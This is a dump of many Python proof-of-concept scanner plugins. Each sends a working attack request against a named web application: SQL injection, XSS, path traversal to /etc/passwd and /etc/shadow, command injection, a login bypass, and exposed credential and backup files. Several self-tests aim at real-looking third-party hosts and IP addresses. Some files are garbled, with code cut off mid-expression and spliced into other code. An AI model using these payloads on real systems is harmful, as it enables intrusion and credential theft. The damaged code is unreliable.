        status, headers, _, _, _ = curl.curl('-I ' + arg + rel_path)
        if status == 200 and headers.find('application/x-msaccess') >= 0:
            security_hole(arg + rel_path)
            break


if __name__ == '__main__':
    from dummy import *
    _, base_url = assign('dkcms', 'http://www.gxltgroup.com/')
    audit(base_url)

-------------------------------------------------------------------------------- /exp_list/exp-1060.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #Author:Little Nine 3 | #BaiduHacking: inurl:ACTIONLOGON.APPPROCESS 4 | #DaLianQianhao XSS 5 | import re 6 | 7 | def assign(service, arg): 8 | if service == "dalianqianhao": 9 | return True, arg 10 | 11 | def audit(arg): 12 | url = arg 13 | payload=url+'ACTIONLOGON.APPPROCESS?mode=1&applicant=%22%3E%3Ch1%3EYourXSShere%3C/h1%3E' 14 | code, head, res, errcode, _ = curl.curl(payload) 15 | if code == 200 and "

YourXSShere

" in res: 16 | security_info(payload) 17 | if __name__ == '__main__': 18 | from dummy import * 19 | audit(assign('dalianqianhao', 'http://jwk.dlvtc.edu.cn/')[1]) 20 | audit(assign('dalianqianhao', 'http://218.7.95.52:800/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-107.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'Ario' 4 | 5 | def assign(service, arg): 6 | if service == "dedecms": 7 | return True, arg 8 | 9 | def audit(arg): 10 | url = arg 11 | _, head, body, _, _ = curl.curl(url + '/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,md5(0x40776562736166657363616E40),5,6,7,8,9%20from%20`%23@__admin`%23') 12 | if body and body.find('2e0e20673083dea5cc87a85d54022049') != -1: 13 | security_hole(url) 14 | 15 | if __name__ == '__main__': 16 | from dummy import * 17 | audit(assign('dedecms', 'http://www.example.com/')[1]) 18 | -------------------------------------------------------------------------------- /exp_list/exp-1072.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import re 3 | 4 | def assign(service, arg): 5 | if service == "taodi": 6 | return True, arg 7 | 8 | def audit(arg): 9 | url = arg 10 | code, head, res, errcode, _ = curl.curl2(url + 'taodi/pic.php?url=cGljLnBocA==') 11 | if code == 200: 12 | m = re.search('file_get_contents', res) 13 | if m: 14 | security_info(m.group(0)) 15 | 16 | if __name__ == '__main__': 17 | from dummy import * 18 | audit(assign('taodi','http://127.0.0.1/')[1]) 19 | -------------------------------------------------------------------------------- /exp_list/exp-1074.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- 
coding: utf-8 -*- 3 | #author:小光 4 | #refer:http://www.wooyun.org/bugs/wooyun-2015-0106478 5 | 6 | 7 | def assign(service, arg): 8 | if service == "yongyou_zhiyuan_a6": 9 | return True, arg 10 | 11 | def audit(arg): 12 | url = 'yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20union%20select%201,2,md5(123),1%23' 13 | target = arg + url 14 | code, head, res, errcode, _ = curl.curl2(target) 15 | if code ==200 and '202cb962ac59075b964b07152d234b70' in res : 16 | security_hole(arg) 17 | 18 | if __name__ == '__main__': 19 | from dummy import * 20 | audit(assign('yongyou_zhiyuan_a6', 'http://oa.wnq.com.cn/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1076.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'ifk' 4 | #Refer https://www.bugscan.net/#!/x/2982 5 | 6 | import urlparse 7 | def assign(service, arg): 8 | if service == 'www': 9 | arr = urlparse.urlparse(arg) 10 | return True, '%s://%s/' % (arr.scheme, arr.netloc) 11 | 12 | def audit(arg): 13 | url = 'diagnostic.php' 14 | payload = 'act=ping&dst=www.baidu.com' 15 | code, head, res, errcode, _ = curl.curl2(arg+url,payload) 16 | if code == 200 and 'OK' in res: 17 | security_hole('dlink unauthenticated command injection '+arg+url) 18 | 19 | if __name__ == '__main__': 20 | from dummy import * 21 | audit(assign('www', 'http://83.233.183.198:8080/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-108.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'Ario' 4 | #SSV-ID: 61188 5 | 6 | def assign(service, arg): 7 | if service == "dedecms": 8 | return True, arg 9 | 10 | def audit(arg): 11 | url = arg + "plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D" 12 | _, head, body, _, re_url = 
curl.curl(url) 13 | if head and head.find('http://www.baidu.com') != -1: 14 | security_note(url) 15 | 16 | if __name__ == '__main__': 17 | from dummy import * 18 | audit(assign('dedecms', 'http://www.ceowo.com/')[1]) 19 | -------------------------------------------------------------------------------- /exp_list/exp-1104.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'ifk' 4 | #Refer http://www.wooyun.org/bugs/wooyun-2010-043380 5 | 6 | import urlparse 7 | def assign(service, arg): 8 | if service == "fsmcms": 9 | return True, arg 10 | 11 | def audit(arg): 12 | payload = '/setup/index.jsp' 13 | code, head, res, errcode, _ = curl.curl2(arg+payload) 14 | if code == 200 and 'alert') != -1 or clock()-start in range(7, 12): 18 | security_hole(url) 19 | 20 | if __name__ == '__main__': 21 | from dummy import * 22 | audit(assign('Tour', 'http://www.qdcqly.com')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1132.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #__author__ = 'ifk' 4 | #Refer http://www.wooyun.org/bugs/wooyun-2010-090403 5 | 6 | def assign(service, arg): 7 | if service == "suyaxing2004": 8 | return True, arg 9 | 10 | def audit(arg): 11 | payload = 'ws2004/SysManage/UserManage/SysManage/editxml.asp?ID=1' 12 | code, head, res, errcode, _ = curl.curl2(arg+payload) 13 | if code == 200 and '' in res: 14 | security_hole('Find admin passwd in '+arg+payload) 15 | 16 | if __name__ == '__main__': 17 | from dummy import * 18 | audit(assign('suyaxing2004', 'http://www.fzjcxx.cn/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1136.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #-*- encoding:utf-8 -*- 3 
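import re
import urlparse
def assign(service, arg):
    """Accept generic 'www' targets and reduce the URL to scheme://host/.

    Returns (True, base_url) for a match; any other service falls through
    and returns None.
    """
    if service == "www":
        arr = urlparse.urlparse(arg)
        return True, '%s://%s/' % (arr.scheme, arr.netloc)

def audit(arg):
    """POST sysCmd=whoami to boafrm/formSysCmd and report command execution.

    Reports via security_hole when the reply is HTTP 200, contains 'root'
    and contains no '<' (so it does not look like an HTML page).
    """
    path = "boafrm/formSysCmd"
    payload = "sysCmd=whoami&apply=Apply&msg="
    code, head, res, errcode, _ = curl.curl2(arg + path, post=payload)
    if code == 200 and 'root' in res and '<' not in res:
        security_hole(arg + path)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('www', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1138.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = 'ifk'
#Refer http://www.wooyun.org/bugs/wooyun-2010-063128

def assign(service, arg):
    """Accept targets fingerprinted as 'suyaxing2004'; returns (True, arg)."""
    if service == "suyaxing2004":
        return True, arg

def audit(arg):
    """Request the addResource.asp management page without credentials.

    Reports via security_hole when the reply is HTTP 200 and contains 'zip'.
    """
    payload = 'ws2004/sysManage/Resource/add/addResource.asp?FunID=1'
    code, head, res, errcode, _ = curl.curl2(arg + payload)
    # NOTE(review): 'zip' is a short, common substring; this check may
    # over-report. The exact page marker is not visible here.
    if code == 200 and 'zip' in res:
        security_hole('未经授权访问 ' + arg + payload)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('suyaxing2004', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/exp_list/exp-1139.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = 'ifk'
#Refer http://www.wooyun.org/bugs/wooyun-2010-0110152

def assign(service, arg):
    """Accept targets fingerprinted as 'ipowercms'; returns (True, arg)."""
    if service == "ipowercms":
        return True, arg

def audit(arg):
    """Send the login.xml.php request below and report a login bypass.

    Reports via security_hole when the reply is HTTP 200 and contains '1'.
    """
    payload = 'm/manager/login.xml.php?username=admin\'%20or%20\'a\'=\'a&password=123&vcode='
    code, head, res, errcode, _ = curl.curl2(arg + payload)
    # NOTE(review): '1' in res matches almost any response body, so this
    # check is likely to over-report; the exact success marker is not
    # visible here.
    if code == 200 and '1' in res:
        security_hole('万能密码 ' + arg + payload)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('ipowercms', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/exp_list/exp-1140.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = 'ifk'
#Refer http://www.wooyun.org/bugs/wooyun-2010-065479

def assign(service, arg):
    """Accept targets fingerprinted as 'phpshe'; returns (True, arg)."""
    if service == "phpshe":
        return True, arg

def audit(arg):
    # NOTE(review): the listing is damaged from the condition below onward.
    # Text between a '<' and a later '>' appears to have been dropped in
    # extraction, so the rest of this plugin and the start of a later
    # 'eyou' plugin are missing. The damaged line is kept as extracted.
    payload = 'install/index.php?step=setting'
    code, head, res, errcode, _ = curl.curl2(arg+payload)
    if code == 200 and '([^<]+)',res)
    if r:
        security_info(r.group(1))

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('eyou', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1148.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#-*- encoding:utf-8 -*-
#__author__ = '1c3z'
#http://www.wooyun.org/bugs/wooyun-2010-0105387

def assign(service, arg):
    """Accept targets fingerprinted as 'vicworl'; returns (True, arg)."""
    if service == "vicworl":
        return True, arg


def audit(arg):
    """Probe home.php?action=article for UNION-based SQL injection.

    Reports via security_hole when the 32-hex marker that the injected
    md5(0x22) is expected to produce appears in the body. The HTTP status
    is not checked.
    """
    # The unused function-scope 'import urllib2' was dropped.
    payloads = ['home.php?action=article&id=-1%20union%20all%20select%201%2C2%2C3%2C4%2Cmd5%280x22%29--']
    for payload in payloads:
        url = arg + payload
        code, head, res, errcode, _ = curl.curl2(url)
        if 'b15835f133ff2e27c7cb28117bfae8f4' in res:
            security_hole(url)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('vicworl', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1149.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#-*- encoding:utf-8 -*-
#__author__ = '1c3z'
#http://www.wooyun.org/bugs/wooyun-2010-0106292

def assign(service, arg):
    """Accept targets fingerprinted as 'vicworl'; returns (True, arg)."""
    if service == "vicworl":
        return True, arg


def audit(arg):
    """Check for a downloadable database backup under data/backup/.

    Reports via security_warning when the reply is HTTP 200 and contains
    'MySQL dump'.
    """
    payload = 'data/backup/VICWOR~1.SQL'
    url = arg + payload
    code, head, res, errcode, _ = curl.curl2(url)
    if code == 200 and 'MySQL dump' in res:
        security_warning(url)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('vicworl', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1161.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = 'ifk'
#Refer http://www.wooyun.org/bugs/wooyun-2012-04854

def assign(service, arg):
    """Accept targets fingerprinted as 'extmail'; returns (True, arg)."""
    if service == "extmail":
        return True, arg

def audit(arg):
    """Check whether extmail/cgi/env.cgi exposes the CGI environment.

    Reports via security_info when the reply is HTTP 200 and contains
    'SERVER_ADMIN'.
    """
    payload = 'extmail/cgi/env.cgi'
    code, head, res, errcode, _ = curl.curl2(arg + payload)
    if code == 200 and 'SERVER_ADMIN' in res:
        security_info(arg + payload)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('extmail', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/exp_list/exp-1162.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = 'ifk'
#Refer http://www.wooyun.org/bugs/wooyun-2010-015005

def assign(service, arg):
    """Accept targets fingerprinted as 'extmail'; returns (True, arg)."""
    if service == "extmail":
        return True, arg

def audit(arg):
    """Check extmail/cgi/index.cgi for reflection of the __mode parameter.

    Reports via security_info when the reply is HTTP 200 and contains
    'testvul'.
    """
    # NOTE(review): the request value that should echo 'testvul' is not in
    # the payload as extracted; it was probably lost with stripped markup.
    payload = 'extmail/cgi/index.cgi?__mode='
    code, head, res, errcode, _ = curl.curl2(arg + payload)
    if code == 200 and 'testvul' in res:
        security_info('反射型 xss ' + arg + payload)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('extmail', 'http://www.example.com/')[1])

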
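--------------------------------------------------------------------------------
/exp_list/exp-1170.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = 01001000entai
#_PlugName_ = php168 zhidao sql
#__Refer___ = http://www.wooyun.org/bugs/wooyun-2010-013476

import re

def assign(service, arg):
    """Accept targets fingerprinted as 'php168'; returns (True, arg)."""
    if service == 'php168':
        return True, arg

def audit(arg):
    """Probe zhidao/user.php for UNION-based SQL injection.

    Reports via security_hole when the reply is HTTP 200 and contains the
    md5 of '1', which the injected md5(1) is expected to produce.
    """
    payload = 'zhidao/user.php?j=question&u=-1+union+select+1,2,3,md5(1),5,6,7,8--'
    target = arg + payload
    code, head, body, errcode, final_url = curl.curl(target)
    if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in body:
        security_hole(target)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('php168', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1179.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-

def assign(service, arg):
    """Accept targets fingerprinted as 'wordpress'; returns (True, arg)."""
    if service == "wordpress":
        return True, arg

def audit(arg):
    """Check the wp-swimteam download.php 'file' parameter for file read.

    Reports via security_hole when the reply is HTTP 200 and contains
    'root'.
    """
    payload = "wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
    url = arg + payload
    code, head, res, errcode, _ = curl.curl(url)
    # NOTE(review): 'root' alone also appears in ordinary pages; a marker
    # such as 'root:' would over-report less. Left unchanged.
    if code == 200 and 'root' in res:
        security_hole(url)

if __name__ == '__main__':
    # Self-test entry point.
    from dummy import *
    audit(assign('wordpress', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-118.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = 'Seay'

def assign(service, arg):
    """Accept targets fingerprinted as 'discuz'; returns (True, arg)."""
    if service == "discuz":
        return True, arg

def audit(arg):
    """Probe faq.php?action=grouppermission for error-based SQL injection.

    Reports via security_hole when the body is non-empty and contains the
    md5 of '1' followed by '1'. The HTTP status is not checked.
    """
    url = arg
    _, head, body, _, _ = curl.curl(url + '/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28md5%281%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23')
    if body and body.find('c4ca4238a0b923820dcc509a6f75849b1') != -1:
        security_hole(url)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('discuz', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1185.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = '0xAE'
#_name_ = ' drupal full path disclousure'
import re
def assign(service, arg):
    """Accept targets fingerprinted as 'drupal'; returns (True, arg)."""
    if service == "drupal":
        return True, arg

def audit(arg):
    """Request ?q[]=x and report a filesystem path leaked in an error.

    Reports via security_info when the reply is HTTP 200 and the body
    matches ' in <path> on line'.
    """
    payload = '?q[]=x'
    verify_url = arg + payload
    pathinfo = re.compile(r' in (.*) on line')
    # The original bound the second tuple element to 'body' and searched
    # it. Every other plugin in this listing unpacks the tuple as
    # (code, head, body, ...), so that searched the headers; the body is
    # searched here instead.
    code, head, body, errcode, _ = curl.curl2(verify_url)
    match = pathinfo.search(body) if body else None
    if code == 200 and match:
        # NOTE(review): other plugins in this listing call security_info
        # with one argument -- confirm it accepts two.
        security_info('drupal full path disclousure vulnerability', verify_url)

if __name__ == '__main__':
    # Self-test entry point.
    from dummy import *
    audit(assign('drupal', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1193.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#-*- encoding:utf-8 -*-
#__author__ = '1c3z'


def assign(service, arg):
    """Accept targets fingerprinted as 'able_g2s'; returns (True, arg)."""
    if service == "able_g2s":
        return True, arg


def audit(arg):
    """Probe CourseExcellence.aspx 'level' parameter for SQL injection.

    Reports via security_hole when the reply is HTTP 200 and contains
    'master'.
    """
    payload = 'G2S/ShowSystem/CourseExcellence.aspx?page=1&level=%E5%9B%BD%E5%AE%B6%E7%BA%A7%27%20and%201=2%20(select%20db_name(1))---'
    url = arg + payload
    code, head, res, errcode, _ = curl.curl2(url)
    if code == 200 and 'master' in res:
        security_hole(url)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('able_g2s', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-120.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = 'ver007'

def assign(service, arg):
    """Accept targets fingerprinted as 'phpcms'; returns (True, arg)."""
    if service == "phpcms":
        return True, arg

def audit(arg):
    """Send the phpsso_server getapplist request and look for 'authkey'.

    Reports via security_hole when the body is non-empty and contains
    'authkey'. The HTTP status is not checked.
    """
    url = arg
    _, head, body, _, _ = curl.curl(url + '/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ')
    if body and body.find('authkey') != -1:
        security_hole(url)

if __name__ == '__main__':
    # Self-test entry point.
    from dummy import *
    audit(assign('phpcms', 'http://www.example.com/')[1])

--------------------------------------------------------------------------------
/exp_list/exp-1204.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""POC Name : Discuz milu_seotool plugin local file inclusion vulnerability; Author : haosen"""

def assign(service, arg):
    """Accept targets fingerprinted as 'discuz'; returns (True, arg)."""
    if service == "discuz":
        return True, arg

def audit(arg):
    """Check the milu_seotool 'myac' parameter for local file inclusion.

    Reports via security_hole when the reply is HTTP 200 and contains
    'User-agent' (the payload points at robots.txt).
    """
    payload = 'plugin.php?id=milu_seotool:sitemap&myac=../../robots.txt%00'
    url = arg + payload
    code, head, res, errcode, _ = curl.curl(url)
    if code == 200 and "User-agent" in res:
        security_hole(url)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('discuz', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1233.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# Can import any built-in Python Library
import urlparse
def assign(service, arg):
    """Accept generic 'www' targets and point them at /inc/conn_db.inc.

    Returns (True, url) for a match; any other service returns None.
    """
    if service != "www":
        return
    arr = urlparse.urlparse(arg)
    return True, '%s://%s/inc/conn_db.inc' % (arr.scheme, arr.netloc)

def audit(arg):
    """Check whether the database include file is served as plain text.

    Reports via security_warning when the reply is HTTP 200 and contains
    'db_id', 'db_name' and 'db_pass'.
    """
    code, head, res, errcode, final_url = curl.curl(arg)
    if code == 200 and 'db_id' in res and 'db_name' in res and 'db_pass' in res:
        security_warning(arg)


if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('www', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1238.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = 01001000entai
#_PlugName_ = easethink_cookie_sqli

def assign(service, arg):
    """Accept targets fingerprinted as 'easethink'; returns (True, arg)."""
    if service == 'easethink':
        return True, arg

def audit(arg):
    """Probe the sort_field_idx cookie on index.php for SQL injection.

    Reports via security_hole when the body contains the first 31 hex
    digits of the md5 of '1'. The HTTP status is not checked.
    """
    #No.1 http://www.wooyun.org/bugs/wooyun-2010-072094
    payload = "index.php"
    target = arg + payload
    code, head, body, errcode, final_url = curl.curl2(target, cookie='sort_field_idx=1=extractvalue(1,concat(0x5c,md5(1)))')
    if 'c4ca4238a0b923820dcc509a6f75849' in body:
        security_hole(target)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('easethink', 'http://www.example.com/')[1])

--------------------------------------------------------------------------------
/exp_list/exp-1252.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#author:IOT
#refer:http://www.51cto.com/art/200812/100919.htm
import base64
def assign(service, arg):
    """Accept targets fingerprinted as 'php168'; returns (True, arg)."""
    if service == "php168":
        return True, arg
def audit(arg):
    """Check job.php?job=download for retrieval of the admin login log.

    The 'url' parameter carries the base64 of arg + '/cache/adminlogin_logs.php'.
    Reports via security_warning when the reply is HTTP 200 and contains
    'logdb'.
    """
    base = arg + '/cache/adminlogin_logs.php'
    s = base64.b64encode(base)
    payload = "job.php?job=download&url=%s" % s
    url = arg + payload
    # The original named the fourth element 'body'; by position it is what
    # the other plugins call errcode, and the body is the third element.
    code, head, res, errcode, _ = curl.curl(url)
    if code == 200 and 'logdb' in res:
        security_warning(url)


if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('php168', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1257.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = 01001000entai
#_PlugName_ = emlog database
#__Refer___ = http://www.wooyun.org/bugs/wooyun-2010-099976

def assign(service, arg):
    """Accept targets fingerprinted as 'emlog'; returns (True, arg)."""
    if service == 'emlog':
        return True, arg

def audit(arg):
    """Check for a downloadable database backup under content/backup/.

    Reports via security_warning when the reply is HTTP 200 and contains
    '#version:emlog'.
    """
    payload = 'content/backup/EMLOG_~1.SQL'
    target = arg + payload
    code, head, body, errcode, final_url = curl.curl2(target)
    if code == 200 and '#version:emlog' in body:
        security_warning(target)

if __name__ == '__main__':
    # Self-test entry point (local instance).
    from dummy import *
    audit(assign('emlog', 'http://127.0.0.1/emlog/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1258.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = 01001000entai
#_PlugName_ = qianhao .ini
#__Refer___ = http://www.wooyun.org/bugs/wooyun-2010-063453

import re

def assign(service, arg):
    """Accept targets fingerprinted as 'dalianqianhao'; returns (True, arg)."""
    if service == 'dalianqianhao':
        return True, arg

def audit(arg):
    """Check whether QHDBCONFIG.INI is served from the web root.

    Reports via security_hole when the reply is HTTP 200 and contains
    'DB_USERNAME='.
    """
    payload = 'QHDBCONFIG.INI'
    target = arg + payload
    code, head, body, errcode, final_url = curl.curl2(target)
    if code == 200 and 'DB_USERNAME=' in body:
        security_hole(target)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('dalianqianhao', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1271.py: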
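--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
_POC Name_ : NS-AGS /commonplugin-Download.php arbitrary file download vulnerability
_References_: http://wooyun.org/bugs/wooyun-2014-058838
_Author_ : 相守
"""
def assign(service, arg):
    """Accept targets fingerprinted as 'ng-ags'; returns (True, arg)."""
    if service == "ng-ags":
        return True, arg

def audit(arg):
    """Check the Download.php 'licensefile' parameter for path traversal.

    Reports via security_hole when the reply is HTTP 200 and contains
    'nobody'.
    """
    url = arg
    payload = 'commonplugin/Download.php?licensefile=../../../../../../../../../../etc/shadow'
    code, head, res, errcode, _ = curl.curl(url + payload)
    if code == 200 and "nobody" in res:
        security_hole(url + payload)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('ng-ags', 'https://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1278.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#-*- encoding:utf-8 -*-
#__author__ = '1c3z'

def assign(service, arg):
    """Accept targets fingerprinted as 'libsys'; returns (True, arg)."""
    if service == "libsys":
        return True, arg


def audit(arg):
    """Request ajax_libsys_view.php with the date-derived 'crc' value.

    The crc is today's month and day ('%m%d') reversed. Reports via
    security_hole when the reply is HTTP 200, contains '[D_B] =>' and does
    not contain the excluded marker.
    """
    import datetime
    crc = datetime.date.today().strftime('%m%d')
    payload = "opac/ajax_libsys_view.php?code=huiwen_opac&crc=" + crc[::-1]

    url = arg + payload
    code, head, res, errcode, _ = curl.curl2(url)
    # NOTE(review): the excluded-marker literal reached this listing as
    # line breaks only; the upstream marker (probably markup) looks lost in
    # extraction -- confirm against the original file.
    if code == 200 and '[D_B] =>' in res and '\n\n' not in res:
        security_hole(url)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('libsys', 'http://www.example.com/')[1])

--------------------------------------------------------------------------------
/exp_list/exp-1279.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#author:小光
#refer:http://www.wooyun.org/bugs/wooyun-2010-099533


def assign(service, arg):
    """Accept targets fingerprinted as 'es-cloud'; returns (True, arg)."""
    if service == "es-cloud":
        return True, arg

def audit(arg):
    """Probe GuideList.aspx 'AppId' for error-based SQL injection.

    Reports via security_hole when the reply is HTTP 500 and contains
    'master'.
    """
    payload = 'Easy/AppNew/GuideList.aspx?AppId='
    getdata = 'db_name%281%29'
    url = arg + payload + getdata
    code, head, res, errcode, _url = curl.curl2(url)
    if code == 500 and 'master' in res:
        security_hole(url + " :found sql Injection")



if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('es-cloud', 'http://www.example.com/')[1])

--------------------------------------------------------------------------------
/exp_list/exp-1280.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#__Refer___ = https://packetstormsecurity.com/files/125632/Kentico-CMS-7.0.75-User-Enumeration.html

import re

def assign(service, arg):
    """Accept targets fingerprinted as 'kesioncms'; returns (True, arg)."""
    # NOTE(review): the service name is 'kesioncms' while the reference and
    # the report message are about Kentico CMS -- confirm which is meant.
    if service == "kesioncms":
        return True, arg

def audit(arg):
    """Request PublicMessageUserSelector.aspx and report user-name exposure.

    Reports via security_info when the reply is HTTP 200 and the marker
    test passes.
    """
    url = arg
    code, head, res, errcode, _ = curl.curl(url + 'CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx')
    # NOTE(review): the marker literal is empty as extracted, which makes
    # the second test always true; the upstream marker was probably markup
    # lost in extraction. As written, any HTTP 200 is reported.
    if code == 200 and '' in res:
        security_info("Kentico CMS user name leakage success")

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('kesioncms', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1286.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = 01001000entai
#_PlugName_ = heeroa
#__Refer___ = http://www.wooyun.org/bugs/wooyun-2010-058143

def assign(service, arg):
    """Accept targets fingerprinted as 'heeroa'; returns (True, arg)."""
    if service == 'heeroa':
        return True, arg

def audit(arg):
    """Check the vfs 'path' parameter for path traversal.

    Reports via security_hole when the reply is HTTP 200 and contains
    'root:'.
    """
    payload = "vfs?path=../../../../../../../../../../etc/passwd"
    target = arg + payload
    code, head, res, errcode, final_url = curl.curl2(target)
    if code == 200 and "root:" in res:
        security_hole(target)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('heeroa', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1289.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#-*- encoding:utf-8 -*-
#__author__ = '1c3z'
#ref http://wooyun.org/bugs/wooyun-2010-087296

def assign(service, arg):
    """Accept targets fingerprinted as 'kingosoft_xsweb'; returns (True, arg)."""
    if service == "kingosoft_xsweb":
        return True, arg


def audit(arg):
    """Probe pub/temp.aspx 'nj' parameter for UNION-based SQL injection.

    Reports via security_hole when the reply is HTTP 200 and contains
    'master'.
    """
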